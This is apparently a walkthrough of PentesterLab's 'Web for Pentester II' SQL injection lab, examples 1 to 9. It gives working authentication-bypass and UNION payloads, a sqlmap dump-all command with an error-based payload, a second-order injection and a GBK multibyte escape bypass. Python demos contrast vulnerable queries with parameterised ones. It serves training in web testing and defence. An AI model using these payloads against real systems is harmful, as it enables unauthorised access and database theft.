SQL Injection
The Web for Pentester 2 is a good entry-level hacking challenge for anyone who wants to be a web application pentester. It can be tricky at times, but that is part of the fun! :)
In this walkthrough of PentesterLab’s “Web for Pentester II,” we’ll explore the SQL Injection 1 to 9 exercises. It’s designed for juniors who are interested in learning how to test web applications for security vulnerabilities, specifically SQL injection. Let’s jump in and learn how to navigate these challenges.
Let’s begin by starting “Web for Pentester II,” and navigating to the Example 1 page.
Example 1
The first example is the most common SQL injection example that you can find. The goal is to bypass the authentication page without submitting any value (password or username).
I always start with simple tests to determine the technologies in use. A simple way of achieving this is to submit a string that causes a processing or parsing error, for example “' 1=”.
As seen in the error above, the backend is running the following SQL query.
SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]'
To bypass the authentication page without submitting any valid value (username or password), we inject the following payload into the username field. It gives us access without valid credentials:
' or 1=1 --
After the injection, the backend query becomes:
SELECT * FROM users WHERE username='[USERNAME]' OR 1=1 -- AND password='[PASSWORD]'
Example 2
This example is similar to the previous one. Here the web application relies on the LIMIT keyword to ensure only one record is returned from the database, so the payload must itself end the query with LIMIT 1 (“' or 1=1 LIMIT 1 --”).
The backend is running the following SQL query.
SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]'
After the injection, the backend query becomes:
SELECT * FROM users WHERE username='[USERNAME]' OR 1=1 LIMIT 1 -- AND password='[PASSWORD]'
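The concatenated login query from Examples 1 and 2 beside its parameterised form, as an added example (not PentesterLab’s code). It runs against a constructed in-memory SQLite table; the exercise uses MySQL, but SQLite also treats “--” as a comment, which is all the bypass relies on.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the exercise's users table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "S3cret!"), (2, "bob", "hunter2")])
    return con

def render_vulnerable_query(username: str, password: str) -> str:
    """The query from the write-up, with user input pasted straight in."""
    return ("SELECT * FROM users WHERE username='" + username
            + "' AND password='" + password + "'")

def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    # A quote in the input closes the string literal; "--" comments out the
    # password check, so any credentials (or none) match a row.
    return con.execute(render_vulnerable_query(username, password)).fetchone()

def login_safe(con: sqlite3.Connection, username: str, password: str):
    # Placeholders: the driver passes the values separately from the SQL text,
    # so the same payload is compared literally against the username column.
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return con.execute(query, (username, password)).fetchone()

if __name__ == "__main__":
    db = make_db()
    for payload in ("' or 1=1 --", "' or 1=1 LIMIT 1 --"):  # Examples 1 and 2
        print(render_vulnerable_query(payload, ""))
        print("  vulnerable:", login_vulnerable(db, payload, ""))
        print("  safe      :", login_safe(db, payload, ""))
```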
Example 3
Triggering an SQL error message now produces a different error. In it, we can see the “'” is now escaped with a backslash, theoretically preventing us from injecting any SQL code.
Since the backslash escapes the next character in a string, we can use this behaviour to transform the query
select * from users where username ='username' and password ='password'
into the following query. A username ending in a backslash turns the closing quote of the username literal into an escaped quote, so the literal runs on until the opening quote of the password field, and the password value is then parsed as SQL. This bypasses the filter and creates an injection point in the password field, where no escaping occurs:
select * from users where username ='username\' and password ='or 1=1 #'
Example 4
In this example, the query is sent to the server via the URL. This is bad development practice: the data ends up in server logs, exposing user credentials, and it lets the user see and alter part of the SQL query.
Since our payload “' or 1=1 #” is valid, placing it in the URL makes the database return all registered users.
Example 5
By converting this simple SQL query into a UNION query, we can append a second SELECT, allowing us to query the entire database.
The base query is something like:
select id, name from users
Adding a union select to the end of the query creates a valid query like this:
select id, name from users union select * from users
Example 6
Similar to the previous exercise, there are at least two ways of listing all registered users. Using the same UNION SELECT technique as before gives the following result.
We can also simply delete the group keyword from the URL to remove all restrictions.
Example 7
We are now presented with an “id=” parameter vulnerable to SQL injection. There are multiple ways of exploiting this parameter, and none of them is more relaxing than letting sqlmap do the dirty work.
"Sqlmap" is a command line program that helps detect and exploit SQL injection vulnerabilities. It is an essential tool for any pentester or hacker as it saves us a lot of time guessing and extracting data from databases.
By reading the manual, it is possible to see that the most basic command to use is:
sqlmap -u 'URL' --dump-all
This command tells sqlmap to dump the entire database and, for recognised password hashes, to attempt to crack them.
Type: error-based (our payload to inject)
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1 AND EXTRACTVALUE(5730,CONCAT(0x5c,0x7162627071,(SELECT (ELT(5730=5730,1))),0x7162627a71))
Example 8
This exercise is an example of a second-order SQL injection. A second-order SQL injection is a type of SQL injection that needs two steps to exploit. First, we inject code that is stored in the database. Second, we access an endpoint that incorporates the stored code into an SQL query and executes it.
In our case, creating a user with our beloved payload “' or 1=1 #” as the username stores the payload in the database.
To trigger the injection, click on the ID number of the record.
Example 9
It took me a while to understand what was happening here. In this exercise, the PHP page that processes our request is escaping our injection strings with the well-known mysql_real_escape_string function.
In our case, the PHP function lets us send a byte sequence that is valid in the GBK character set (simplified Chinese) used by the database but not by the escaping step: the backslash PHP inserts before the quote merges with the preceding byte into a single multi-byte GBK character, so PHP never sees an unescaped quote, while the database processes the following byte as a bare “'”.
Using the following payload bypasses the authentication process once again:
呵' or 1=1 #
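A simulation of the Example 9 bypass, added here and not part of PentesterLab’s code. naive_escape is an assumed stand-in for mysql_real_escape_string when PHP escapes in a single-byte charset while MySQL decodes the same bytes as GBK; charset_aware_escape shows what decoding in the server’s charset first changes.

```python
def naive_escape(raw: bytes) -> bytes:
    """Escape ' " \\ and NUL one byte at a time, blind to multi-byte characters."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):   # ' " \ NUL
            out.append(0x5C)                 # prepend a backslash byte
        out.append(b)
    return bytes(out)

def build_login_query(username: bytes, password: bytes) -> bytes:
    """The write-up's login query, assembled from escaped bytes."""
    return (b"SELECT * FROM users WHERE username='" + naive_escape(username)
            + b"' AND password='" + naive_escape(password) + b"'")

def as_seen_by(query: bytes, charset: str) -> str:
    """Decode the query bytes the way a server using `charset` would."""
    return query.decode(charset)

def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Decode in the server's charset first, then escape characters, not bytes.
    A byte sequence that is not a valid GBK character is rejected outright."""
    text = raw.decode(charset)               # strict: raises on a lone lead byte
    for ch in ("\\", "'", '"'):
        text = text.replace(ch, "\\" + ch)
    return text.encode(charset)

def escape_rejects(raw: bytes, charset: str) -> bool:
    try:
        charset_aware_escape(raw, charset)
    except UnicodeDecodeError:
        return True
    return False

# The write-up's payload as a browser sends it in UTF-8: e5 91 b5 27 20 6f ...
# The trailing byte b5 of the character is a valid GBK lead byte, and once the
# escaper inserts 5c, GBK reads "b5 5c" as one character and 27 stays a bare quote.
PAYLOAD = "呵' or 1=1 #".encode("utf-8")
QUERY = build_login_query(PAYLOAD, b"x")

if __name__ == "__main__":
    print("escaper's view :", as_seen_by(QUERY, "latin1"))
    print("MySQL's view   :", as_seen_by(QUERY, "gbk"))
    print("charset-aware escaper rejects payload:", escape_rejects(PAYLOAD, "gbk"))
```

Prepared statements, or setting the client charset on the connection so the escaper and the server agree, close this gap; the escaper above only shows why agreeing on the charset matters.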